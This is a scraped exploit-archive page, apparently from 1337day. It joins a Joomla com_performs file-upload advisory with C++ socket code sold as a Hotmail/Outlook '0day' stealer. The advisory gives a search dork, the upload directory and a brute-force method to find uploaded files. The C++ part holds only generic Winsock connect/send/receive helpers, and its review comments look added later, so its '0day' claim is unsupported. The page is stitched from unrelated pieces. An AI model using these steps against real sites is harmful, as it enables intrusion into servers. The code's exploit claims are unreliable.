# Exploit Title: [Joomla Com_performs component arbitrary file upload]
# Google Dork: inurl:index.php?option=com_performs upload cv
# Date : [2012-09-27]
# Exploit Author: [Mormoroth]
# Vendor Homepage: [http://www.performs.org.au/]
# Version: [2.4 and prior]
# Tested on: [Linux/Windows]
------------
An attacker can upload files through the component's uploader form. Uploaded files go to /joomlaPath/media/uploads. The form builder renames each uploaded file using a simple combination of the date and time; for example, an uploaded file is renamed to
>> 2012-09-28-20-05-Unknown-file.txt
[2012-09-28] is the current date and [20-05] is the time of the upload (hour/minute). [Unknown] never changes, and the original file name follows it. The upload time, which is the hard part of guessing the exact uploaded file name, can be found by simple brute force.
------------
From Iran
# 619EDDF21B6569C0 1337day.com [2013-09-01] 7FA32A6DFA150769 # |
Saturday, 31 August 2013
Joomla Component com_performs component arbitrary file upload
Posted on 21:20 by Eagle Eye
Microsoft Hotmail or Outlook 0day exploit by squirrel sploit
Posted on 00:26 by Eagle Eye
/*
Caution: read this first:
English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRg
French Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVA
To exploit this vulnerability you must Download Squirrel-sploit.
English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRg
French Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVA
*/
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <winsock.h>
#include <string>
#include <direct.h>
#pragma comment(lib, "wsock32.lib")
using namespace std;

// Server port constant (80 is the standard HTTP port). It is not referenced by
// any of the functions visible in this listing.
#define SERVER_PORT 80

// Connection state shared by every helper below.
// NOTE(review): `sock` is declared int, while Winsock's socket() returns a
// SOCKET handle; the helpers store and compare it as an int.
WORD sockVersion;     // Winsock version requested in createConnection()
WSADATA wsaData;      // filled in by WSAStartup()
int sock;             // descriptor of the single active connection
sockaddr_in rserver;  // remote endpoint built by createConnection()

// Forward declarations of the helpers defined further down.
void header();
int createConnection(string targetAddr, int targetPort);
int sendTransmission(string message);
string recvTransmission();
void cleanUp();
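// Open a TCP connection to serverIP:port and publish it in the global `sock`.
//
// serverIP must be a dotted-quad IPv4 literal: it is parsed with inet_addr(),
// which performs no name resolution.
// port must fit in 16 bits, because it is passed through htons().
//
// Returns 0 on success and 1 on any failure. On failure no socket is left
// open; Winsock itself stays initialised once WSAStartup() has succeeded, so
// cleanUp() remains the matching teardown call.
int createConnection(string serverIP, int port)
{
    // htons() takes a 16-bit value; reject anything it would silently truncate.
    if (port <= 0 || port > 65535)
    {
        fprintf(stderr, "error: invalid port %d\n", port);
        return 1;
    }

    sockVersion = MAKEWORD(1, 1);
    const int startupError = WSAStartup(sockVersion, &wsaData);
    if (startupError != 0)
    {
        // WSAStartup() returns its error code directly.
        fprintf(stderr, "error: WSAStartup() failed: %d\n", startupError);
        return 1;
    }

    // inet_addr() signals a malformed address with INADDR_NONE.
    const unsigned long address = inet_addr(serverIP.c_str());
    if (address == INADDR_NONE)
    {
        fprintf(stderr, "error: invalid IPv4 address\n");
        return 1;
    }

    memset(&rserver, 0, sizeof(rserver));
    rserver.sin_family = AF_INET;
    rserver.sin_port = htons(static_cast<u_short>(port));
    rserver.sin_addr.s_addr = address;

    // Winsock reports failures through WSAGetLastError(), not errno, so
    // perror() would print an unrelated message here.
    const SOCKET handle = socket(AF_INET, SOCK_STREAM, 0);
    if (handle == INVALID_SOCKET)
    {
        fprintf(stderr, "error: socket() failed: %d\n", WSAGetLastError());
        sock = -1;
        return 1;
    }

    if (connect(handle, reinterpret_cast<const sockaddr *>(&rserver), sizeof(rserver)) == SOCKET_ERROR)
    {
        fprintf(stderr, "error: connect() failed: %d\n", WSAGetLastError());
        closesocket(handle);  // do not leak the handle of a failed connection
        sock = -1;
        return 1;
    }

    // NOTE(review): the global is an int in this file while SOCKET is
    // pointer-sized; the narrowing matches what the file already did.
    sock = static_cast<int>(handle);
    return 0;
}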
// Print the start-up banner to stdout.
//
// The function only writes fixed text: an ASCII-art logo, a download location,
// two tutorial links and a usage line. It opens no socket and sends nothing.
// NOTE(review): the art lines contain backslash sequences such as \_ and \/
// that are not standard escapes; they are kept exactly as in the original.
void header()
{
    static const char *const bannerLines[] = {
        "________________________________________________________\n",
        " ___ _ _ _ _ _ \n",
        " / __| __ _ _ _(_)_ _ _ _ ___| |___ ____ __| |___(_) |_ \n",
        " \__ \/ _` | || | | '_| '_/ -_) |___(_-< '_ \ / _ \ | _|\n",
        " |___/\__, |\_,_|_|_| |_| \___|_| /__/ .__/_\___/_|\__|\n",
        " |_| |_| \n",
        "\n",
        "_________________________________________________________\n\n",
        "Download : sourceforge.net/projects/squirrelsploit/ \n\n",
        "Tutorial (English): youtube.com/watch?v=zfsBXz3lmRg \n\n",
        " (French) : youtube.com/watch?v=X_HGCXajyVA \n\n",
        "set> stealmail xxxx@hotmail.com \n",
    };
    const size_t lineCount = sizeof(bannerLines) / sizeof(bannerLines[0]);

    // None of the lines contains a '%', so writing them with fputs() produces
    // the same bytes as passing each one to printf() as a format string.
    for (size_t i = 0; i < lineCount; ++i)
    {
        fputs(bannerLines[i], stdout);
    }
}
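// Send the whole of `message` over the global socket `sock`.
//
// send() may accept fewer bytes than requested, so the call is repeated until
// every byte has been handed over.
// Returns the number of bytes sent, which is message.length() on success.
// On a socket error the Winsock error code is printed and the process exits
// with status 1, as before.
// The length is passed to send() as an int, so messages longer than an int
// can express are not supported.
int sendTransmission(string message)
{
    const char *cursor = message.data();
    size_t remaining = message.length();
    int total = 0;

    while (remaining > 0)
    {
        const int sent = send(sock, cursor, static_cast<int>(remaining), 0);
        if (sent == SOCKET_ERROR)
        {
            // Winsock does not set errno; report its own error code instead.
            fprintf(stderr, "error: send() failed: %d\n", WSAGetLastError());
            exit(1);
        }
        if (sent == 0)
        {
            break;  // no progress: stop instead of spinning
        }
        cursor += sent;
        remaining -= static_cast<size_t>(sent);
        total += sent;
    }
    return total;
}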
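// Read from the global socket `sock` one byte at a time until a NUL byte
// arrives, the peer closes the connection, or recv() fails.
//
// Returns the bytes received so far. As in the original, a terminating NUL
// byte is included in the returned string when one was received.
//
// The original read an uninitialised heap byte in its loop condition, never
// freed that byte, and kept appending the last byte forever once recv()
// returned 0 or an error; all three are fixed here.
// NOTE(review): the result still grows without limit for as long as the peer
// keeps sending non-NUL bytes; callers that talk to untrusted servers may want
// a size cap.
string recvTransmission()
{
    string result;
    char byte = 0;

    for (;;)
    {
        const int received = recv(sock, &byte, 1, 0);
        if (received == SOCKET_ERROR)
        {
            // Winsock does not set errno; report its own error code instead.
            fprintf(stderr, "error: recv() failed: %d\n", WSAGetLastError());
            break;
        }
        if (received == 0)
        {
            break;  // orderly shutdown by the peer: nothing more to read
        }

        result += byte;
        if (byte == '\0')
        {
            break;  // end-of-message marker
        }
    }
    return result;
}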
// Tear down the connection: close the global socket `sock`, then call
// WSACleanup(). The return codes of both calls are ignored.
void cleanUp()
{
    ::closesocket(sock);
    ::WSACleanup();
}
# 2497E0FBB782321B 1337day.com [2013-08-31] ED68B33B0E4103BB #
Categories: Exploit